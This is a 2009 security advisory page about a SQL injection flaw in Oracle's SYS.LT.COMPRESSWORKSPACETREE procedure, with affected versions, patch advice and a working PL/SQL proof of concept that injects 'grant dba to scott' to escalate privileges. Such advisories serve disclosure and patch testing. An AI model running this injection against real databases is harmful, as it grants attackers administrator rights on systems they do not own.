Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
|
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
Name |
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
|
Systems Affected |
Oracle Database Server versions 9iR2, 10gR1, 10gR2 and 11gR1 |
Severity |
High Risk |
Category |
Escalate User Privileges |
Vendor URL |
http://www.oracle.com/ |
Credit |
Esteban Martinez Fayo |
Exploit |
http://www.milw0rm.com |
Date |
2 Jul 2009 |
Details
The COMPRESSWORKSPACETREE procedure is owned by SYS or by WMSYS (depending on the Oracle version), one user can call this procedure with malicious code and execute
PL/SQL statements and elevate the privileges as the user were the package owner.
Example
Example written from Sumit Siddharth
SQL> DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;
/
Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )
© 2009 by Red-Database-Security GmbH - last update 19-jun-2009
|
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.
|